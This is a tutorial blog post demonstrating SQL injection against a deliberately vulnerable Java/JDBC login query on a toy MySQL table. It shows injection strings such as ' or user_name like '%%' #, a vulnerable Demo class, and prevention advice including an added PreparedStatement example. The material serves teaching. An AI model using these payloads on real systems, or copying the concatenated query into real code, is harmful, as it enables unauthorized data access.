SQL injection (case demonstration)


1. What is SQL injection?

Extra SQL is appended to a query statement the program defined in advance, so that, without the administrator's knowledge, an illegal operation is carried out: the database server is tricked into executing an unauthorized, arbitrary query and returning the corresponding data.
In layman's terms, SQL injection is:
finding flaws through SQL statements and reading data you are not authorized to read.

2. Implementation steps

Description:
SQL injection is explained with a simple query case.
The case uses the Java language and a MySQL database.

1. Create a new data table

1. Create a new data table and add a few rows of data

# Create the table
CREATE TABLE `user`  (
  `user_name` varchar(255),
  `password` varchar(255)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
# Insert rows into the table
INSERT INTO `user` VALUES ('zhangsan', '123456');
INSERT INTO `user` VALUES ('1', '2');
INSERT INTO `user` VALUES ('1', '1');
INSERT INTO `user` VALUES ('1', '3');

At this time the table holds the four rows inserted above (the original post shows a screenshot of the table here).

2. SQL injection analysis

1. Define the SQL statement

It can be seen that the parameters userName and password are concatenated into the SQL statement as plain strings, which means any content can be passed in:
String sql = "select * from user where user_name = '" + userName + "' and password = '" + password + "'";

2. Set the userName and password parameter values

Obtaining illegal data is demonstrated by changing the value of the parameter userName.
The value of userName is divided into four cases; in all four cases the value of password is the fixed value 1.

Get data with legal parameters
String userName = "1";
String password = "1";
After passing the parameters, the SQL statement becomes:
select * from user where user_name = '1' and password = '1'
At this time, a piece of data can be read from the database:
User(userName=1, password=1)

Illegal parameters to obtain data (1): knowing part of the information lets you obtain the rest
String userName = "1' or password = '";
String password = "1";
After passing the parameters, the SQL statement becomes:
select * from user where user_name = '1' or password = '' and password = '1'
At this time, three rows can be read from the database (AND binds tighter than OR, so the condition reduces to user_name = '1'):
User(userName=1, password=2)
User(userName=1, password=1)
User(userName=1, password=3)

Illegal parameters to obtain data (2): all information can be obtained without knowing anything
String userName = "' or user_name like '%%' or password = '";
String password = "1";
After passing the parameters, the SQL statement becomes:
select * from user where user_name = '' or user_name like '%%' or password = '' and password = '1'
Four rows can be read from the database at this time:
User(userName=zhangsan, password=123456)
User(userName=1, password=2)
User(userName=1, password=1)
User(userName=1, password=3)

Illegal parameters to obtain data (3): use # to comment out the redundant SQL
String userName = "' or user_name like '%%' # or password = ' ";
String password = "1";
After passing the parameters, the SQL statement becomes (in MySQL, # starts a comment that runs to the end of the line):
select * from user where user_name = '' or user_name like '%%' # or password = ' ' and password = '1'
Four rows can be read from the database at this time:
User(userName=zhangsan, password=123456)
User(userName=1, password=2)
User(userName=1, password=1)
User(userName=1, password=3)

3. Code case

1. Create a new User entity class

【Description】
If you do not use Lombok's @Data annotation, you need to add the getter and setter methods and a toString method yourself.

import lombok.Data;

// Entity class mapped to one row of the user table
@Data
public class User {
    private String userName;
    private String password;
}

2. Create a new Demo class to experience SQL injection

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;
import java.util.List;
import java.util.concurrent.CopyOnWriteArrayList;

// Deliberately vulnerable demo: the query is built by string concatenation
public class Demo {

    public static void main(String[] args) throws Exception {

//        String userName = "1";  // normal operation
//        String userName = "1' or password = '"; // knowing a little information is enough to obtain the rest
//        String userName = "' or user_name like '%%' or password = '"; // nothing is needed to obtain all the information
        String userName = "' or user_name like '%%' # or password = ' "; // upgraded version
        String password = "1";

        // Load the database driver
        Class.forName("com.mysql.jdbc.Driver");
        // Create the database connection (replace the placeholder with the database that holds the user table)
        Connection conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/<db_with_user_table>?" +
                "characterEncoding=utf-8&useUnicode=true", "root", "123456");
        // Define the SQL statement
        String sql = "select * from user where user_name = '" + userName + "' and password = '" + password + "'";
        // Print the concatenated SQL statement
        System.out.println(sql);
        // Create the SQL execution object
        Statement stmt = conn.createStatement();
        // Execute the SQL statement and return the result set
        ResultSet rs = stmt.executeQuery(sql);
        // Copy the result set into a List
        List<User> userList = new CopyOnWriteArrayList<>();
        while (rs.next()) {
            User user = new User();
            user.setUserName(rs.getString(1));
            user.setPassword(rs.getString(2));
            userList.add(user);
        }
        // Release the JDBC resources
        rs.close();
        stmt.close();
        conn.close();
        // Print the result set
        for (User user : userList) {
            System.out.println(user);
        }
    }
}

3. How to prevent SQL injection

  1. SQL precompilation (Java provides the PreparedStatement class)
  2. Check the parameters (using regular expressions, etc.)
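A defensive counterpart to the Demo class above, added here as an example and not part of the original post: the same query written with PreparedStatement (prevention 1) together with a regular-expression parameter check (prevention 2), run against the payload of case (3). The class name SafeDemo, the allowed-character pattern and the connection placeholders are assumptions.

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.regex.Pattern;

// Added example (not the original post's code): the login query with
// PreparedStatement, plus an allow-list check on userName before it is used.
public class SafeDemo {
    // Assumption: a valid user name is 1-32 letters, digits or underscores.
    private static final Pattern USER_NAME = Pattern.compile("^[A-Za-z0-9_]{1,32}$");

    // Parameter check: rejects quotes, spaces and '#' before the value reaches the database.
    static boolean isValidUserName(String userName) {
        return userName != null && USER_NAME.matcher(userName).matches();
    }

    // The SQL text is fixed and precompiled; the values are bound to the '?' placeholders,
    // so quotes and '#' inside userName remain data and cannot change the query structure.
    static int countMatches(Connection conn, String userName, String password) throws SQLException {
        String sql = "select * from user where user_name = ? and password = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, userName);
            ps.setString(2, password);
            try (ResultSet rs = ps.executeQuery()) {
                int rows = 0;
                while (rs.next()) rows++;
                return rows;
            }
        }
    }

    public static void main(String[] args) throws Exception {
        // The "upgraded" payload from the post; with string concatenation it returned all 4 rows.
        String payload = "' or user_name like '%%' # or password = ' ";
        System.out.println("payload passes parameter check: " + isValidUserName(payload)); // false
        System.out.println("'1' passes parameter check: " + isValidUserName("1"));         // true

        // Placeholder connection details; use the database that holds the user table.
        try (Connection conn = DriverManager.getConnection(
                "jdbc:mysql://localhost:3306/<db_with_user_table>?characterEncoding=utf-8&useUnicode=true",
                "root", "<password>")) {
            // 0 rows: no user_name literally equals the payload string.
            System.out.println("rows for payload: " + countMatches(conn, payload, "1"));
            // 1 row: User(userName=1, password=1), the legal case from the post.
            System.out.println("rows for legal parameters: " + countMatches(conn, "1", "1"));
        }
    }
}
```

In a real application the parameter check should reject the request before any query runs; the bound query is shown running on the payload only to make visible that it returns nothing.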

Origin blog.csdn.net/weixin_44580492/article/details/112392239